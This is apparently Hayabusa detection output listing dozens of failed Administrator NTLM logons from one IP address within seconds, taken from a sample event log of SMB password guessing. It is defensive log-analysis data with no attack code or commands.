2016-09-20 01:50:16.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nrq1g8ktTQbPTXqn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.947 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 943GV3t1muba5IQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.982 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HPVd28zf85AxdGqd | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.023 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D6evoSSxcKkHspuc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C4fznmrnIdUH7DzG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.099 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AwrrYjUV41P0K5Jh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z4RBZrALEnH5BKP9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LU6uWH4gs4iHP7rV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: hCfhZDAH8ufk77zN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TE9pw4UeRldGeKVc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.312 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z8PKE05MqxE5TwXT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GIE5fmddOPBbCM3u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.414 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pveyo4Czx6KWKCGn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zPyyHaRnBec7Qg2x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3b8mudJp5mdkiEW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7Y6mjLaCzR28Q2qK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.563 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dMsNKWEjeCYYQVqw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I7c5fENhkwO6QfEU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cr1wAeMhPgVpwV82 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.692 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fErpp9Ww6LO37C9k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CYsNpBsGT5zOKe3p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.866 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sgzUk1Dmttm4AQ3s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hp0c3YYyOSJuBHCR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gkis4H1MIQPHUwqf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lb6mH03qKLb8O7Dz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J10xEmhRNWfJ5FCI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Dujj8A7wwzAwzCp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NVDE3fIoUQfLn3cd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.175 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UlD48O0XpFUnuSmo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.213 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KyTPKuspADmLpv0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BdIAPiH32ZbmCgTK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1dEiN2xOA4E9Wl5p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fBeAez2fLjXB0dk3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gQ45aeMDc3Snabvv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QWSYdr4lJlhCLMMW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RgxHY7072aUCdfa0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9yKhEodJDTVCGdIG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z0odyPQmvkGRNWZF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.630 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b5uRpG0fxCK75DPV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d9dcEzpJRW5YA8Bj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hv3B9bwB1YIaBa6N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.743 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lJf9Obml4aVxE5zp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mvnSOaRSkGU6Uf5q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.808 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JSAkZsZsv0SaLKaO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.847 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r6rnM6QbwfbbrcGy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RX0GW7K5wdQJUx4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xm7CpD5i735McsvS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.959 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bHxjZsnR25J47Ez8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.999 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J1JWj91m79FyykH6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.043 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h9i0GncOzpz5REWp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BODZRJ6G3xxw29VJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJ2lq4piINfmI7Qe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.167 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NqDeXdOitJ3WY8w4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FnoHQf7QDxoI4tel | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.261 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FqkbgrtBa5VFxPry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TMD57GtY15bfWBre | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.350 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e3lT9UgWr82PcAjf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SpwhTfFlvvccnI5N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 10CfKdnvWf4UVuME | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.539 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YYLMax3okIqntHM1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.602 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qk9TPAK51EdVORwY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.670 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aVKRUnNu2nGslW7P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZJ2AYRLcMbMVixg6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.759 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Sl9ucxM2Nu3xjNq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AFeBGB6qA7OaYV7l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.837 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KLUEKG9CzQYsH3Vp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.875 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vVZ44YKdRYY59zaC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: umU8pDDZFvvUVsHY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nn7rA0uRegtHgaF1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2dgiakCKweT4GUGD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.039 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kptipiLujNVePYfy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.091 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: plaXJ1rEGpU3SzV2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.132 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I4pALF2luLfg36GC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.173 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZLO4cufbFcRhRy8b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.215 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a845OfrFKxy31Yhg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
